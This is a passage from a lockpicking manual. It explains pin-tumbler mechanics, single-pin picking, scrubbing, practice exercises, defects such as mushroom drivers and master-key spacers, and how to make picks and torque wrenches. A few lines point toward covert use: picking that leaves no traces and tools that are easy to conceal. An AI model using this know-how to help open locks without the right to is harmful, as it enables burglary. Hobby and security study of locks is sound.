An incorrect key will leave some of the pins protruding between the hull and the plug, and these pins will prevent the plug from rotating. .... Chapter 3 ... THE FLATLAND MODEL . In order to become good at picking locks, you will need a detailed understanding of how locks works and what happens as it is picked. This document uses two models to help you understand the behavior of locks. This chapter presents a model that highlights interactions between pin positions. Chapter 4 uses this model to explain how picking works. Chapter 9 will use this model to explain complicated mechanical defects. . The "flatland" model of a lock is shown in Figure 3.1 This is not a cross section of a real lock. It is a cross section of a very simple kind of lock. The purpose of this lock is to keep two plates of metal from sliding over each other unless the proper key is present. The lock is constructed by playing the two plates over each other and drilling holes which pass through both plates. The figure shows a two hole lock. Two pins are placed in each hole such that the gap between the pins does not line up with the gap between the plates. The bottom pin is called the "key pin" because it touches the key. The top pin is called the "driver pin." Often the driver and the key pins are just called the driver and the pin. A protrusion on the underside of the bottom plate keeps the pins from falling out, and a spring above the top plates pushed down on the driver pin. . If the key is absent, the plates cannot slide over each other because the driver pins pass through both plates. See Figure 3.3. That is, the key lifts the key pin until its top reaches the lock's sheer line. In this configuration the plates can slide past each other. . Figure 3.3 also illustrates one of the important features of real locks. There is always a sliding allowance. That is, any parts which will slide past each other must be separated by a gap. 
The gap between the top and bottom plates allows a range of keys to open the lock. Notice that the right key pin in Figure 3.3 is not raised as high as the left pin, yet the lock will still open. .... Chapter 4 .. BASIC PICKING & THE BINDING DEFECT . The flatland model highlights the basic defect that enables lockpicking to work. This defect makes it possible to open a lock by lifting the pins one at a time, and thus you don't need a key to lift all the pins at the same time. Figure 4.3 shows how the pins of a lock can be set one at a time. The first step of the procedure is to apply a sheer force to the lock by pushing on the bottom plate. This force causes one or more the of pins to be scissored between the top and bottom plate. The most common defect in a lock is that only one pin will bind. Figure 4.3a shows the left pin binding. Even though a pin is binding, it can be pushed up with a picking tool; see Figure 4.3b. When the top of the key pin reaches the sheer line, the bottom plate will slide slightly. If the pick is removed the driver pin will be held up by the overlapping bottom plate, and the key pin will drop down to its initial position; see Figure 4.3c. The slight movement of the bottom plate causes a new pin to bind. The same procedure can be used to set the new pin. . Thus, the procedure for "one pin at a time picking" a lock is to apply a sheer force, find the pin which is binding the most and push it up. When the top of the key pin reaches the sheer line, the moving portion of the lock will give slightly, and driver pin will be trapped above the sheer line. This is called "setting" a pin. . Chapter 9 discusses the different defects that cause pins to bind one at a time. . 1. Apply a sheer force. . 2. Find the pin that is binding the most. . 3. Push that pin up until you feel it set at the sheer line. . 4. Go to step 2. . Table 4.1: Figure 5: Picking a lock one pin at a time. .... Chapter 5 ... The Pin Column Model . 
The flatland model of locks can explain effects that involve more than one pin, but a different model is needed to explain the detailed behavior of a single pin. See Figure 5.1. The pin-column model highlights the relationship between the torque applied and the amount of force needed to lift each pin. It is essential that you understand this relationship.

In order to understand the "feel" of lockpicking you need to know how the movement of a pin is affected by the torque applied by your torque wrench (tensioner) and the pressure applied by your pick. A good way to represent this understanding is a graph that shows the minimum pressure needed to move a pin as a function of how far the pin has been displaced from its initial position. The remainder of this chapter uses the pin-column model to describe that force graph.

Figure 5.2 shows a single pin position after torque has been applied to the plug. The forces acting on the driver pin are the friction from the sides, the spring contact force from above, and the contact force from the key pin below. The amount of pressure you apply to the pick determines the contact force from below.

The spring force increases as the pins are pushed into the hull, but the increase is slight, so we will assume that the spring force is constant over the range of displacements we are interested in. The pins will not move unless you apply enough pressure to overcome the spring force. The binding friction is proportional to how hard the driver pin is being scissored between the plug and the hull, which in this case is proportional to the torque. The more torque you apply to the plug, the harder it will be to move the pins. To make a pin move, you need to apply a pressure that is greater than the sum of the spring and friction forces.

When the bottom of the driver pin reaches the shear line, the situation suddenly changes. See Figure 5.3. The friction binding force drops to zero and the plug rotates slightly (until some other pin binds). Now the only resistance to motion is the spring force. After the top of the key pin crosses the gap between the plug and the hull, a new contact force arises from the key pin striking the hull. This force can be quite large, and it causes a peak in the amount of pressure needed to move a pin.

If the pins are pushed further into the hull, the key pin acquires a binding friction like the driver pin had in the initial situation. See Figure 5.4. Thus, the amount of pressure needed to move the pins before and after the shear line is about the same. Increasing the torque increases the required pressure. At the shear line, the pressure increases dramatically due to the key pin hitting the hull. This analysis is summarized graphically in Figure 5.5.

Chapter 6
Basic Scrubbing

At home you can take your time picking a lock, but in the field, speed is always essential. This chapter presents a lockpicking technique called "scrubbing" that can quickly open most locks.

The slow step in basic picking (Chapter 4) is locating the pin which is binding the most. The force diagram (Figure 5.5) developed in Chapter 5 suggests a fast way to select the correct pin to lift. Assume that all the pins could be characterized by the same force diagram. That is, assume that they all bind at once and that they all encounter the same friction. Now consider the effect of running the pick over all the pins with a pressure that is great enough to overcome the spring and friction forces but not great enough to overcome the collision force of the key pin hitting the hull. Any pressure that is above the flat portion of the force graph and below the top of the peak will work. As the pick passes over a pin, the pin will rise until it hits the hull, but it will not enter the hull. See Figure 5.3. The collision force at the shear line resists the pressure of the pick, so the pick rides over the pin without pressing it into the hull. If the proper torque is being applied, the plug will rotate slightly. As the pick leaves the pin, the key pin will fall back to its initial position, but the driver pin will catch on the edge of the plug and stay above the shear line. See Figure 6.1. In theory one stroke of the pick over the pins will cause the lock to open.

In practice, at most one or two pins will set during a single stroke of the pick, so several strokes are necessary. Basically, you use the pick to scrub back and forth over the pins while you adjust the amount of torque on the plug. The exercises in Chapter 8 will teach you how to choose the correct torque and pressure.

You will find that the pins of a lock tend to set in a particular order. Many factors affect this order (see Chapter 9), but the primary cause is a misalignment between the center axis of the plug and the axis on which the holes were drilled. See Figure 6.2. If the axis of the pin holes is skewed from the center line of the plug, then the pins will set from back to front if the plug is turned one way, and from front to back if the plug is turned the other way. Many locks have this defect.

Scrubbing is fast because you don't need to pay attention to individual pins. You only need to find the correct torque and pressure. Figure 6.1 summarizes the steps of picking a lock by scrubbing. The exercises will teach you how to recognize when a pin is set and how to apply the correct forces. If a lock doesn't open quickly, then it probably has one of the characteristics described in Chapter 9 and you will have to concentrate on individual pins.

1. Insert the pick and torque wrench. Without applying any torque, pull the pick out to get a feel for the stiffness of the lock's springs.
2. Apply a light torque. Insert the pick without touching the pins. As you pull the pick out, apply pressure to the pins. The pressure should be slightly larger than the minimum necessary to overcome the spring force.
3. Gradually increase the torque with each stroke of the pick until pins begin to set.
4. Keeping the torque fixed, scrub back and forth over the pins that have not set. If additional pins do not set, release the torque and start over with the torque found in the last step.
5. Once the majority of the pins have been set, increase the torque and scrub the pins with a slightly larger pressure. This will set any pins which have not set low due to beveled edges, etc.

Table 6.1 (Figure 13): Basic scrubbing.

Chapter 7
Advanced Lockpicking

Simple lockpicking is a trade that anyone can learn. However, advanced lockpicking is a craft that requires mechanical sensitivity, physical dexterity, visual concentration and analytic thinking. If you strive to excel at lockpicking, you will grow in many ways.

7.1 Mechanical Skills

Learning how to pull the pick over the pins is surprisingly difficult. The problem is that the mechanical skills you learned early in life involved maintaining a fixed position or fixed path for your hands independent of the amount of force required. In lockpicking, you must learn how to apply a fixed force independent of the position of your hand. As you pull the pick out of the lock you want to apply a fixed pressure on the pins. The pick should bounce up and down in the keyway according to the resistance offered by each pin.

To pick a lock you need feedback about the effects of your manipulations. To get the feedback, you must train yourself to be sensitive to the sound and the feel of the pick passing over the pins. This is a mechanical skill that can only be learned with practice. The exercises will help you recognize the important information coming from your fingers.

7.2 Zen and the Art of Lockpicking
In order to excel at lockpicking, you must train yourself to have a visually reconstructive imagination. The idea is to use information from all your senses to build a picture of what is happening inside the lock as you pick it. Basically, you want to project your senses into the lock to receive a full picture of how it is responding to your manipulations. Once you have learned how to build this picture, it is easy to choose manipulations that will open the lock.

All your senses provide information about the lock. Touch and sound provide the most information, but the other senses can reveal critical information. For example, your nose can tell whether a lock has been lubricated recently. As a beginner, you will need to use your eyes for hand-eye coordination, but as you improve you will find it unnecessary to look at the lock. In fact, it is better to ignore your eyes and build an image of the lock based on the information you receive from your fingers and ears.

The goal of this mental skill is to acquire a relaxed concentration on the lock. Don't force the concentration. Try to ignore the sensations and thoughts that are not related to the lock. Don't try to focus on the lock.

7.3 Analytic Thinking

Each lock has its own special characteristics which make picking harder or easier. If you learn to recognize and exploit the "personality traits" of locks, picking will go much faster. Basically, you want to analyze the feedback you get from the lock to diagnose its personality traits and then use your experience to decide on an approach to open the lock. Chapter 9 discusses a large number of common traits and ways to exploit or overcome them.

People underestimate the analysis involved in lockpicking. They think that the picking tool opens the lock. To them the torque wrench is a passive tool that just puts the lock under the desired stress. Let me propose another way to view the situation. The pick is just running over the pins to get information about the lock. Based on an analysis of that information, the torque is adjusted to make the pins set at the shear line. It's the torque wrench that opens the lock.

Varying the torque as the pick moves in and out of the keyway is a general trick that can be used to get around several picking problems. For example, if the middle pins are set, but the end pins are not, you can increase the torque as the pick moves over the middle pins. This will reduce the chances of disturbing the correctly set pins. If some pin doesn't seem to lift up far enough as the pick passes over it, then try reducing the torque on the next pass.

The skill of adjusting the torque while the pick is moving requires careful coordination between your hands, but as you become better at visualizing the process of picking the lock, you will become better at this important skill.

Chapter 8
Exercises

This chapter presents a series of exercises that will help you learn the basic skills of lockpicking. Some exercises teach a single skill, while others stress the coordination of skills.

When you do these exercises, focus on the skills, not on opening the lock. If you focus on opening the lock, you will get frustrated and your mind will stop learning. The goal of each exercise is to learn something about the particular lock you are holding and something about yourself. If a lock happens to open, focus on the memory of what you were doing and what you felt just before it opened.

These exercises should be practiced in short sessions. After about thirty minutes you will find that your fingers become sore and your mind loses its ability to achieve relaxed concentration.

8.1 Exercise 1: Bouncing the pick

This exercise helps you learn the skill of applying a fixed pressure with the pick independent of how the pick moves up and down in the lock. Basically you want to learn how to let the pick bounce up and down according to the resistance offered by each pin.

How you hold the pick makes a difference in how easy it is to apply a fixed pressure. You want to hold it in such a way that the pressure comes from your fingers or your wrist. Your elbow and shoulder do not have the dexterity required to pick locks. While you are scrubbing a lock notice which of your joints are fixed, and which are allowed to move. The moving joints are providing the pressure.

One way to hold a pick is to use two fingers to provide a pivot point while another finger levers the pick to provide the pressure. Which fingers you use is a matter of personal choice. Another way to hold the pick is like holding a pencil. With this method, your wrist provides the pressure. If your wrist is providing the pressure, your shoulder and elbow should provide the force to move the pick in and out of the lock. Do not use your wrist to both move the pick and apply pressure.

A good way to get used to the feel of the pick bouncing up and down in the keyway is to try scrubbing over the pins of an open lock. The pins cannot be pushed down, so the pick must adjust to the heights of the pins. Try to feel the pins rattle as the pick moves over them. If you move the pick quickly, you can hear the rattle. This same rattling feel will help you recognize when a pin is set correctly. If a pin appears to be set but it doesn't rattle, then it is false set. False set pins can be fixed by pushing them down farther, or by releasing torque and letting them pop back to their initial position.

One last word of advice. Focus on the tip of the pick. Don't think about how you are moving the handle; think about how you are moving the tip of the pick.

8.2 Exercise 2: Picking pressure

This exercise will teach you the range of pressures you will need to apply with a pick. When you are starting, just apply pressure when you are drawing the pick out of the lock. Once you have mastered that, try applying pressure when the pick is moving inward.

With the flat side of your pick, push down on the first pin of a lock. Don't apply any torque to the lock. The amount of pressure you are applying should be just enough to overcome the spring force. This force gives you an idea of the minimum pressure you will apply with a pick.

The spring force increases as you push the pin down. See if you can feel this increase.

Now see how it feels to push down the other pins as you pull the pick out of the lock. Start out with both the pick and torque wrench in the lock, but don't apply any torque. As you draw the pick out of the lock, apply enough pressure to push each pin all the way down.

The pins should spring back as the pick goes past them. Notice the sound that the pins make as they spring back. Notice the popping feel as the pick goes past each pin. Notice the springy feel as the pick pushes down on each new pin.

To help you focus on these sensations, try counting the number of pins in the lock. Door locks at MIT have seven pins; padlocks usually have four.

To get an idea of the maximum pressure, use the flat side of your pick to push down all the pins in the lock. Sometimes you will need to apply this much pressure to a single pin. If you encounter a new kind of lock, perform this exercise to determine the stiffness of its springs.

8.3 Exercise 3: Picking Torque

This exercise will teach you the range of torque you will need to apply to a lock. It demonstrates the interaction between the torque and pressure which was described in Chapter 5.

The minimum torque you will use is just enough to overcome the friction of rotating the plug in the hull. Use your torque wrench to rotate the plug until it stops. Notice how much torque is needed to move the plug before the pins bind. This force can be quite high for locks that have been left out in the rain. The minimum torque for padlocks includes the force of a spring that is attached between the plug and the shackle bolt.

To get a feel for the maximum value of torque, use the flat side of the pick to push all the pins down, and try applying enough torque to make the pins stay down after the pick is removed. If your torque wrench has a twist in it, you may not be able to hold down more than a few pins.

If you use too much torque and too much pressure you can get into a situation like the one you just created. The key pins are pushed too far into the hull and the torque is sufficient to hold them there.

The range of picking torque can be found by gradually increasing the torque while scrubbing the pins with the pick. Some of the pins will become harder to push down. Gradually increase the torque until some of the pins set. These pins will lose their springiness. Keeping the torque fixed, use the pick to scrub the pins a few times to see if other pins will set.

The most common mistake of beginners is to use too much torque. Use this exercise to find the minimum torque required to pick the lock.

8.4 Exercise 4: Identifying Set Pins

While you are picking a lock, try to identify which pins are set. You can tell a pin is set because it will have a slight give. That is, the pin can be pushed down a short distance with a light pressure, but it becomes hard to move after that distance (see Chapter 6 for an explanation). When you remove the light pressure, the pin springs back up slightly. Set pins also rattle if you flick them with the pick. Try listening for that sound.

Run the pick over the pins and try to decide whether the set pins are in the front or back of the lock (or both). Try identifying exactly which pins are set. Remember that pin one is the frontmost pin (i.e., the pin that a key touches first). The most important skill of lockpicking is the ability to recognize correctly set pins. This exercise will teach you that skill.

Try repeating this exercise with the plug turning in the other direction. If the front pins set when the plug is turned one way, the back pins will set when the plug is turned the other way. See Figure 6.2 for an explanation.

One way to verify how many pins are set is to release the torque, and count the clicks as the pins snap back to their initial position. Try this. Try to notice the difference in sound between the snap of a single pin and the snap of two pins at once. A pin that has been false set will also make a snapping sound.

Try this exercise with different amounts of torque and pressure. You should notice that a larger torque requires a larger pressure to make pins set correctly. If the pressure is too high, the pins will be jammed into the hull and stay there.

8.5 Exercise 5: Projection

As you are doing the exercises, try building a picture in your mind of what is going on. The picture does not have to be visual; it could be a rough understanding of which pins are set and how much resistance you are encountering from each pin. One way to foster this picture building is to try to remember your sensations and beliefs about a lock just before it opened. When a lock opens, don't think "that's over", think "what happened."

This exercise requires a lock that you find easy to pick. It will help you refine the visual skills you need to master lockpicking. Pick the lock, and try to remember how the process felt. Rehearse in your mind how everything feels when the lock is picked properly. Basically, you want to create a movie that records the process of picking the lock. Visualize the motion of your muscles as they apply the correct pressure and torque, and feel the resistance encountered by the pick. Now pick the lock again trying to match your actions to the movie.

By repeating this exercise, you are learning how to formulate detailed commands for your muscles and how to interpret feedback from your senses.
The mental rehearsal teaches you how to build a visual understanding of the lock and how to recognize the major steps of picking it. .... Chapter 9 .. Recognizing and Exploiting Personality Traits . Real locks have a wide range of mechanical features and defects that help and hinder lockpicking. If a lock doesn't respond to scrubbing, then it probably has one of the traits discussed in this chapter. To open the lock, you must diagnose the trait and apply the recommended technique. The exercises will help you develop the mechanical sensitivity and dexterity necessary to recognize and exploit the different traits. 9.1 Which Way To Turn . It can be very frustrating to spend a long time picking a lock and then discover that you turned the plug the wrong way. If you turn a plug the wrong way it will rotate freely until it hits a stop, or until it rotates 180 degrees and the drivers enter the keyway (see Section 9.11). Section 9.11 also explains how to turn the plug more than 180 degrees if that is necessary to fully retract the bolt. When the plug is turned in the correct direction, you should feel an extra resistance when the plug cam engages the bolt spring. . The direction to turn the plug depends on the bolt mechanism, not on the lock, but here are some general rules. Cheap padlocks will open if the plug is turned in either direction, so you can chose the direction which is best for the torque wrench. All padlocks made by the Master company can be opened in either direction. Padlocks made by Yale will only open if the plug is turned clockwise. The double plug Yale cylinder locks generally open by turning the bottom of the keyway (i.e., the flat edge of the key) away from the nearest door frame. Single plug cylinder locks also follow this rule. See Figure 9.1. Locks built into the doorknob usually open clockwise. Desk and filing cabinet locks also tend to open clockwise. . When you encounter a new kind of lock mechanism, try turning the plug in both directions. 
In the correct direction, the plug will be stopped by the pins, so the stop will feel mushy when you use heavy torque. In the wrong direction the plug will be stopped by a metal tab, so the stop will feel solid. 9.2 How Far to Turn . The companion question to which way to turn a lock is how far to turn it. Desk and filing cabinet locks generally open with less than a quarter turn. Locks which are separate from the doorknob tend to require a half turn to open. Deadbolt lock mechanisms can require almost a full turn to open. . Turning a lock more than 180 degrees is difficult because the drivers enter the bottom of the keyway. See Section 9.11. 9.3 Gravity . Picking a lock that has the springs at the top is different than picking one with the springs at the bottom. It should be obvious how to tell the two apart. The nice feature of a lock with the springs at the bottom is that gravity holds the key pins down once they set. With the set pins out of the way, it is easy to find and manipulate the remaining unset pins. It is also straight forward to test for the slight give of a correctly set pin. When the springs are on top, gravity will pull the key pins down after the driver pin catches at the sheer line. In this case, you can identify the set pins by noticing that the key pin is easy to lift and that it does not feel springy. Set pins also rattle as you draw the pick over them because they are not being pushed down by the driver pin. 9.4 Pins Not Setting . If you scrub a lock and pins are not setting even when you vary the torque, then some pin has a false set and it is keeping the rest of the pins from setting. Consider a lock whose pins appear to set from back to front. If the backmost pin false sets high or low (see Figure 9.2), then the plug cannot rotate enough to allow the other bins to bind. It is hard to recognize that a pin has false set because the springiness of the front pins makes it hard to sense the small give of a correctly set back pin. 
The main symptom of this situation is that the other pins will not set unless a very large torque is applied.

When you encounter this situation, release the torque and start over by concentrating on the back pins. Try a light torque and moderate pressure, or heavy torque and heavy pressure. Try to feel for the click that happens when a pin reaches the shear line and the plug rotates slightly. The click will be easier to feel if you use a stiff torque wrench.

9.5 Elastic Deformation

The interesting events of lockpicking happen over distances measured in thousandths of an inch. Over such short distances, metals behave like springs. Very little force is necessary to deflect a piece of metal over those distances, and when the force is removed, the metal will spring back to its original position.

Deformation can be used to your advantage if you want to force several pins to bind at once. For example, picking a lock with pins that prefer to be set from front to back is slow because the pins set one at a time. This is particularly true if you only apply pressure as the pick is drawn out of the lock. Each pass of the pick will only set the frontmost pin that is binding. Numerous passes are required to set all the pins. If the preference for setting is not very strong (i.e., the axis of the plug holes is only slightly skewed from the plug's center line), then you can cause additional pins to bind by applying extra torque. Basically, the torque puts a twist in the plug that causes the front of the plug to be deflected further than the back of the plug. With light torque, the back of the plug stays in its initial position, but with medium to heavy torque, the front pin columns bend enough to allow the back of the plug to rotate and thus cause the back pins to bind. With the extra torque, a single stroke of the pick can set several pins, and the lock can be opened quickly. Too much torque causes its own problems.
When the torque is large, the front pins and plug holes can be deformed enough to prevent the pins from setting correctly. In particular, the first pin tends to false set low. Figure 9.2 shows how excess torque can deform the bottom of the driver pin and prevent the key pin from reaching the shear line. This situation can be recognized by the lack of give in the first pin. Correctly set pins feel springy if they are pressed down slightly. A falsely set pin lacks this springiness. The solution is to press down hard on the first pin. You may want to reduce the torque slightly, but if you reduce torque too much then the other pins will unset as the first pin is being depressed.

It is also possible to deform the top of the key pin. The key pin is scissored between the plug and the hull and stays fixed. When this happens, the pin is said to be "false set high."

9.6 Loose Plug

The plug is held in the hull by being wider at the front and by having a cam on the back that is bigger than the hole drilled into the hull. If the cam is not properly installed, the plug can move in and out of the lock slightly. On the outward stroke of the pick, the plug will move forward, and if you apply pressure on the inward stroke, the plug will be pushed back.

The problem with a loose plug is that the driver pins tend to set on the back of the plug holes rather than on the sides of the holes. When you push the plug in, the drivers will unset. You can use this defect to your advantage by only applying pressure on the outward or inward stroke of the pick. Alternatively, you can use your finger or torque wrench to prevent the plug from moving forward.

9.7 Pin Diameter

When the pair of pins in a particular column have different diameters, that column will react strangely to the pressure of the pick.
The top half of Figure 9.3 shows a pin column with a driver pin that has a larger diameter than the key pin. As the pins are lifted, the picking pressure is resisted by the binding friction and the spring force. Once the driver clears the shear line, the plug rotates (until some other pin binds) and the only resistance to motion is the spring force. If the key pin is small enough and the plug did not rotate very far, the key pin can enter the hull without colliding with the edge of the hull. Some other pin is binding, so again the only resistance to motion is the spring force. This relationship is graphed in the bottom half of the figure. Basically, the pins feel normal at first, but then the lock clicks and the pin becomes springy. The narrow key pin can be pushed all the way into the hull without losing its springiness, but when the picking pressure is released, the key pin will fall back to its initial position while the large driver catches on the edge of the plug hole.

The problem with a large driver pin is that the key pin tends to get caught in the hull when some other pin sets. Imagine that a neighboring pin sets and the plug rotates enough to bind the narrow key pin. If the pick was pressing down on the narrow key pin at the same time as it was pressing down on the pin that set, then the narrow key pin will be in the hull and it will get stuck there when the plug rotates.

The behavior of a large key pin is left as an exercise for the reader.

9.8 Beveled Holes and Rounded Pins

Some lock manufacturers (e.g., Yale) bevel the edges of the plug holes and/or round off the ends of the key pins. This tends to reduce the wear on the lock and it can both help and hinder lockpicking. You can recognize a lock with these features by the large give in set pins. See Figure 9.4.
That is, the distance between the height at which the driver pin catches on the edge of the plug hole and the height at which the key pin hits the hull is larger (sometimes as large as a sixteenth of an inch) when the plug holes are beveled or the pins are rounded. While the key pin is moving between those two heights, the only resistance to motion will be the force of the spring. There won't be any binding friction. This corresponds to the dip in the force graph shown in Figure 5.5.

A lock with beveled plug holes requires more scrubbing to open than a lock without beveled holes because the driver pins set on the bevel instead of setting on the top of the plug. The plug will not turn if one of the drivers is caught on a bevel. The key pin must be scrubbed again to push the driver pin up and off the bevel. The left driver pin in Figure 9.6a is set. The driver is resting on the bevel, and the bottom plate has moved enough to allow the right driver to bind. Figure 9.6b shows what happens after the right driver pin sets. The bottom plate slides further to the right and now the left driver pin is scissored between the bevel and the top plate. It is caught on the bevel. To open the lock, the left driver pin must be pushed up above the bevel. Once that driver is free, the bottom plate can slide and the right driver may bind on its bevel.

If you encounter a lock with beveled plug holes, and all the pins appear to be set but the lock is not opening, you should reduce torque and continue scrubbing over the pins. The reduced torque will make it easier to push the drivers off the bevels. If pins unset when you reduce the torque, try increasing the torque and picking pressure. The problem with increasing the force is that you may jam some key pins into the hull.

9.9 Mushroom Driver Pins

A general trick that lock makers use to make picking harder is to modify the shape of the driver pin.
The most popular shapes are mushroom, spool and serrated; see Figure 9.7. The purpose of these shapes is to cause the pins to false set low. These drivers stop a picking technique called vibration picking (see Section 9.12), but they only slightly complicate scrubbing and one-pin-at-a-time picking (see Chapter 4).

If you pick a lock and the plug stops turning after a few degrees and none of the pins can be pushed up any further, then you know that the lock has modified drivers. Basically, the lip of the driver has caught at the shear line. See the bottom of Figure 9.7. Mushroom and spool drivers are often found in Russwin locks, and in locks that have several spacers for master keying.

You can identify the positions with the mushroom drivers by applying a light torque and pushing up on each pin. The pins with mushroom drivers will exhibit a tendency to bring the plug back to the fully locked position. By pushing the key pin up you are pushing the flat top of the key pin against the tilted bottom of the mushroom driver. This causes the driver to straighten up, which in turn causes the plug to unrotate. You can use this motion to identify the columns that have mushroom drivers. Push those pins up to the shear line; even if you lose some of the other pins in the process, they will be easier to re-pick than the pins with mushroom drivers. Eventually all the pins will be correctly set at the shear line.

One way to identify all the positions with mushroom drivers is to use the flat of your pick to push all the pins up about halfway. This should put most of the drivers in their cockable position and you can feel for them.

To pick a lock with modified drivers, use a lighter torque and heavier pressure. You want to err on the side of pushing the key pins too far into the hull. In fact, another way to pick these locks is to use the flat side of your pick to push the pins up all the way, and apply very heavy torque to hold them there.
Use a scrubbing action to vibrate the key pins while you slowly reduce the torque. Reducing the torque reduces the binding friction on the pins. The vibration and spring force cause the key pins to slide down to the shear line.

The key to picking locks with modified drivers is recognizing incorrectly set pins. A mushroom driver set on its lip will not have the springy give of a correctly set driver. Practice recognizing the difference.

9.10 Master Keys

Many applications require keys that open only a single lock and keys that open a group of locks. The keys that open a single lock are called "change keys" and the keys that open multiple locks are called "master keys." To allow both the change key and the master key to open the same lock, a locksmith adds an extra pin called a "spacer" to some of the pin columns. See Figure 9.8. The effect of the spacer is to create two gaps in the pin column that could be lined up with the shear line. Usually the change key aligns the top of the spacer with the shear line, and the master key aligns the bottom of the spacer with the shear line (the idea is to prevent people from filing down a change key to get a master key). In either case the plug is free to rotate.

In general, spacers make a lock easier to pick. They increase the number of opportunities to set each pin, and they make it more likely that the lock can be opened by setting all the pins at about the same height. In most cases only two or three positions will have spacers. You can recognize a position with a spacer by the two clicks you feel when the pin is pushed down. If the spacer has a smaller diameter than the driver and key pins, then you will feel a wide springy region because the spacer will not bind as it passes through the shear line. It is more common for the spacer to be larger than the driver pin. You can recognize this by an increase in friction when the spacer passes through the shear line.
Since the spacer is larger than the driver pin, it will also catch better on the plug. If you push the spacer further into the hull, you will feel a strong click when the bottom of the spacer clears the shear line.

Thin spacers can cause serious problems. If you apply heavy torque and the plug has beveled holes, the spacer can twist and jam at the shear line. It is also possible for the spacer to fall into the keyway if the plug is rotated 180 degrees. See Section 9.11 for the solution to this problem.

9.11 Driver or Spacer Enters Keyway

Figure 9.9 shows how a spacer or driver pin can enter the keyway when the plug is rotated 180 degrees. You can prevent this by placing the flat side of your pick in the bottom of the keyway BEFORE you turn the plug too far. If a spacer or driver does enter the keyway and prevents you from turning the plug, use the flat side of your pick to push the spacer back into the hull. You may need to use the torque wrench to relieve any shear force that is binding the spacer or driver. If that doesn't work, try raking over the drivers with the pointed side of your pick. If a spacer falls into the keyway completely, the only option is to remove it. A hook-shaped piece of spring steel works well for this, though a bent paperclip will work just as well unless the spacer becomes wedged.

9.12 Vibration Picking

Vibration picking works by creating a large gap between the key and driver pins. The underlying principle is familiar to anyone who has played pool. When the cue ball strikes another ball squarely, the cue ball stops and the other ball heads off with the same speed and direction as the cue ball. Now imagine a device that kicks the tips of all the key pins. The key pins would transfer their momentum to the driver pins, which would fly up into the hull. If you are applying a light torque when this happens, the plug will rotate when all the drivers are above the shear line.

9.13 Disk Tumblers
The inexpensive locks found on desks use metal disks instead of pins. Figure 9.10 shows the basic workings of these locks. The disks have the same outline but differ in the placement of the rectangular cut.

These locks are easy to pick with the right tools. Because the disks are placed close together, a half-round pick works better than a half-diamond pick (see Figure A.1). You may also need a torque wrench with a narrower head. Use moderate to heavy torque.

Chapter 10

Final Remarks

Lockpicking is a craft, not a science. This document presents the knowledge and skills that are essential to lockpicking, but more importantly it provides you with models and exercises that will help you study locks on your own. To excel at lockpicking, you must practice and develop a style which fits you personally. Remember that the best technique is the one that works best for you.

Appendix A

Tools

This appendix describes the design and construction of lockpicking tools.

A.1 Pick Shapes

Picks come in several shapes and sizes. Figure A.1 shows the most common shapes. The handle and tang of a pick are the same for all picks. The handle must be comfortable and the tang must be thin enough to avoid bumping pins unnecessarily. If the tang is too thin, then it will act like a spring and you will lose the feel of the tip interacting with the pins. The shape of the tip determines how easily the pick passes over the pins and what kind of feedback you get from each pin.

The design of a tip is a compromise between the ease of insertion, ease of withdrawal and feel of the interaction. The half diamond tip with shallow angles is easy to insert and remove, so you can apply pressure when the pick is moving in either direction. It can quickly pick a lock that has little variation in the lengths of the key pins. If the lock requires a key that has a deep cut between two shallow cuts, the pick may not be able to push the middle pin down far enough.
The half diamond pick with steep angles could deal with such a lock, and in general steep angles give you better feedback about the pins. Unfortunately, the steep angles make it harder to move the pick in the lock. A tip that has a shallow front angle and a steep back angle works well for Yale locks.

The half round tip works well in a disk tumbler lock. See Section 9.13. The full diamond and full round tips are useful for locks that have pins at the top and bottom of the keyway.

The rake tip is designed for picking pins one by one. It can also be used to rake over the pins, but the pressure can only be applied as the pick is withdrawn. The rake tip allows you to carefully feel each pin and apply varying amounts of pressure. Some rake tips are flat or dented on the top to make it easier to align the pick on the pin. The primary benefit of picking pins one at a time is that you avoid scratching the pins. Scrubbing scratches the tips of the pins and the keyway, and it spreads metal dust throughout the lock. If you want to avoid leaving traces, you must avoid scrubbing.

The snake tip can be used for scrubbing or picking. When scrubbing, the multiple bumps generate more action than a regular pick. The snake tip is particularly good at opening five-pin household locks. When a snake tip is used for picking, it can set two or three pins at once. Basically, the snake pick acts like a segment of a key which can be adjusted by lifting and lowering the tip, by tilting it back and forth, and by using either the top or bottom of the tip. You should use moderate to heavy torque with a snake pick to allow several pins to bind at the same time. This style of picking is faster than using a rake and it leaves as little evidence.

A.2 Street Cleaner Bristles

The spring steel bristles used on street cleaners make excellent tools for lockpicking. The bristles have the right thickness and width, and they are easy to grind into the desired shape.
The resulting tools are springy and strong. Section A.3 describes how to make tools that are less springy.

The first step in making tools is to sand off any rust on the bristles. Coarse grit sandpaper works fine, as does a steel wool cleaning pad (not copper wool). If the edges or tip of the bristle are worn down, use a file to make them square.

A torque wrench has a head and a handle as shown in Figure A.2. The head is usually 1/2 to 3/4 of an inch long and the handle varies from 2 to 4 inches long. The head and the handle are separated by a bend that is about 80 degrees. The head must be long enough to reach over any protrusions (such as a grip-proof collar) and firmly engage the plug. A long handle allows delicate control over torque, but if it is too long, it will bump against the door frame. The handle, head and bend angle can be made quite small if you want to make tools that are easy to conceal (e.g., in a pen, flashlight or belt buckle). Some torque wrenches have a 90 degree twist in the handle. The twist makes it easy to control the torque by controlling how far the handle has been deflected from its rest position. The handle acts as a spring which sets the torque. The disadvantage of this method of setting the torque is that you get less feedback about the rotation of the plug. To pick difficult locks you will need to learn how to apply a steady torque via a stiff handled torque wrench.

The width of the head of a torque wrench determines how well it will fit the keyway. Locks with narrow keyways (e.g. desk locks) need torque wrenches with narrow heads. Before bending the bristle, file the head to the desired width. A general purpose wrench can be made by narrowing the tip (about 1/4 inch) of the head. The tip fits small keyways while the rest of the head is wide enough to grab a normal keyway.

The hard part of making a torque wrench is bending the bristle without cracking it.
To make the 90 degree handle twist, clamp the head of the bristle (about one inch) in a vise and use pliers to grasp the bristle about 3/8 of an inch above the vise. You can use another pair of pliers instead of a vise. Apply a 45 degree twist. Try to keep the axis of the twist lined up with the axis of the bristle. Now move the pliers back another 3/8 inch and apply the remaining 45 degrees. You will need to twist the bristle more than 90 degrees in order to set a permanent 90 degree twist.

